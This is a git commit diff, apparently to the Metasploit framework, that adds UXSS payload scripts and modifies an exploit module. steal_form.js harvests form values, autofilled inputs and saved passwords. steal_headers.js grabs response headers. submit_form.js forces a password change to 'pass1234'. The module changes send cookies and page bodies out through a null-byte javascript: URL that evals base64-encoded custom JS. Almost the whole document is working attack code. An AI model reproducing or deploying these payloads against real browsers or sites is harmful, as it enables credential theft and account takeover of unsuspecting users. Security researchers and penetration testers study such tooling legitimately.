Add some common UXSS scripts.
parent
27889ea411
commit
7793ed4fea
|
@ -0,0 +1,33 @@
|
||||||
|
/* steal_form.js: can be injected into a frame/window after a UXSS */
|
||||||
|
/* exploit to steal any autofilled inputs, saved passwords, or any */
|
||||||
|
/* data entered into a form. */
|
||||||
|
|
||||||
|
/* keep track of what input fields we have discovered */
|
||||||
|
var found = {};
|
||||||
|
setInterval(function(){
|
||||||
|
/* poll the DOM to check for any new input fields */
|
||||||
|
var inputs = document.querySelectorAll('input,textarea,select');
|
||||||
|
Array.prototype.forEach.call(inputs, function(input) {
|
||||||
|
var val = input.value||'';
|
||||||
|
var name = input.getAttribute('name')||'';
|
||||||
|
var t = input.getAttribute('type')||'';
|
||||||
|
if (input.tagName == 'SELECT') {
|
||||||
|
try { val = input.querySelector('option:checked').value }
|
||||||
|
catch (e) {}
|
||||||
|
}
|
||||||
|
if (input.tagName == 'INPUT' && t.toLowerCase()=='hidden') return;
|
||||||
|
|
||||||
|
/* check if this is a valid input/value pair */
|
||||||
|
try {
|
||||||
|
if (val.length && name.length) {
|
||||||
|
if (found[name] != val) {
|
||||||
|
|
||||||
|
/* new input/value discovered, remember it and send it up */
|
||||||
|
found[name] = val;
|
||||||
|
var result = { name: name, value: val, url: window.location.href, send: true };
|
||||||
|
(opener||top).postMessage(JSON.stringify(result), '*');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
} catch (e) {}
|
||||||
|
});
|
||||||
|
}, 200);
|
|
@ -0,0 +1,17 @@
|
||||||
|
/* steal_headers.js: can be injected into a frame/window after a UXSS */
|
||||||
|
/* exploit to steal the response headers of the loaded URL. */
|
||||||
|
|
||||||
|
/* send an XHR request to our current page */
|
||||||
|
var x = new XMLHttpRequest;
|
||||||
|
x.open('GET', window.location.href, true);
|
||||||
|
x.onreadystatechange = function() {
|
||||||
|
/* when the XHR request is complete, grab the headers and send them back */
|
||||||
|
if (x.readyState == 2) {
|
||||||
|
(opener||top).postMessage(JSON.stringify({
|
||||||
|
headers: x.getAllResponseHeaders(),
|
||||||
|
url: window.location.href,
|
||||||
|
send: true
|
||||||
|
}), '*');
|
||||||
|
}
|
||||||
|
};
|
||||||
|
x.send();
|
|
@ -0,0 +1,36 @@
|
||||||
|
/* submit_form.js: can be injected into a frame/window after a UXSS */
|
||||||
|
/* exploit to modify and submit a form in the target page. */
|
||||||
|
|
||||||
|
/* modify this hash to your liking */
|
||||||
|
var formInfo = {
|
||||||
|
|
||||||
|
/* CSS selector for the form you want to submit */
|
||||||
|
selector: 'form[action="/update_password"]',
|
||||||
|
|
||||||
|
/* inject values into some input fields */
|
||||||
|
inputs: {
|
||||||
|
'user[new_password]': 'pass1234',
|
||||||
|
'user[new_password_confirm]': 'pass1234'
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
var c = setInterval(function(){
|
||||||
|
/* find the form... */
|
||||||
|
var form = document.querySelector(formInfo.selector);
|
||||||
|
if (!form) return;
|
||||||
|
|
||||||
|
/* loop over every input field, set the value as specified. */
|
||||||
|
Array.prototype.forEach.call(form.elements, function(input) {
|
||||||
|
var inject = formInfo.inputs[input.name];
|
||||||
|
if (inject) input.setAttribute('value', inject);
|
||||||
|
});
|
||||||
|
|
||||||
|
/* submit the form and clean up */
|
||||||
|
form.submit();
|
||||||
|
clearInterval(c);
|
||||||
|
|
||||||
|
/* report back */
|
||||||
|
var message = "Form submitted to "+form.getAttribute('action');
|
||||||
|
var url = window.location.href;
|
||||||
|
(opener||top).postMessage(JSON.stringify({message: message, url: url}), '*');
|
||||||
|
}, 100);
|
|
@ -53,6 +53,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
false,
|
false,
|
||||||
"Bypass URLs that have X-Frame-Options by using a one-click popup exploit.",
|
"Bypass URLs that have X-Frame-Options by using a one-click popup exploit.",
|
||||||
false
|
false
|
||||||
|
]),
|
||||||
|
OptBool.new('CLOSE_POPUP', [
|
||||||
|
false,
|
||||||
|
"When BYPASS_XFO is enabled, this closes the popup window after exfiltration.",
|
||||||
|
true
|
||||||
])
|
])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
@ -76,8 +81,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
var received = [];
|
var received = [];
|
||||||
|
|
||||||
window.addEventListener('message', function(e) {
|
window.addEventListener('message', function(e) {
|
||||||
if (bypassXFO && received[JSON.parse(e.data).i]) return;
|
var data = JSON.parse(e.data);
|
||||||
|
if (!data.send) {
|
||||||
|
if (bypassXFO && data.i && received[data.i]) return;
|
||||||
if (bypassXFO && e.data) received.push(true);
|
if (bypassXFO && e.data) received.push(true);
|
||||||
|
}
|
||||||
var x = new XMLHttpRequest;
|
var x = new XMLHttpRequest;
|
||||||
x.open('POST', window.location, true);
|
x.open('POST', window.location, true);
|
||||||
x.send(e.data);
|
x.send(e.data);
|
||||||
|
@ -105,12 +113,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
function attack(target, n, i, cachedN) {
|
function attack(target, n, i, cachedN) {
|
||||||
var exploit = function(){
|
var exploit = function(){
|
||||||
window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage(JSON.stringify({cookie:document'+
|
window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage('+
|
||||||
'.cookie,url:location.href,body:document.body.innerHTML,i:'+(i||0)+'}),"*");'+
|
'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
|
||||||
'#{datastore['CUSTOM_JS']||''};}void(0);', n);
|
'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(datastore['CUSTOM_JS'])}"'+
|
||||||
|
'));}void(0);', n);
|
||||||
}
|
}
|
||||||
if (!n) {
|
if (!n) {
|
||||||
n = cachedN || randomString();
|
n = cachedN || randomString();
|
||||||
|
var closePopup = #{datastore['CLOSE_POPUP']};
|
||||||
var w = window.open(target, n);
|
var w = window.open(target, n);
|
||||||
var deadman = setTimeout(function(){
|
var deadman = setTimeout(function(){
|
||||||
clearInterval(clear);
|
clearInterval(clear);
|
||||||
|
@ -119,15 +129,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
}, 10000);
|
}, 10000);
|
||||||
var clear = setInterval(function(){
|
var clear = setInterval(function(){
|
||||||
if (received[i]) {
|
if (received[i]) {
|
||||||
|
if (i < targets.length-1) {
|
||||||
try{ w.stop(); }catch(e){}
|
try{ w.stop(); }catch(e){}
|
||||||
try{ w.location='data:text/html,<p>Loading...</p>'; }catch(e){}
|
try{ w.location='data:text/html,<p>Loading...</p>'; }catch(e){}
|
||||||
|
}
|
||||||
|
|
||||||
clearInterval(clear);
|
clearInterval(clear);
|
||||||
clearInterval(clear2);
|
clearInterval(clear2);
|
||||||
clearTimeout(deadman);
|
clearTimeout(deadman);
|
||||||
|
|
||||||
if (i < targets.length-1) {
|
if (i < targets.length-1) {
|
||||||
setTimeout(function(){ attack(targets[i+1], null, i+1, n); },100);
|
setTimeout(function(){ attack(targets[i+1], null, i+1, n); },100);
|
||||||
} else {
|
} else {
|
||||||
w.close();
|
if (closePopup) w.close();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}, 50);
|
}, 50);
|
||||||
|
|
Loading…
Reference in New Issue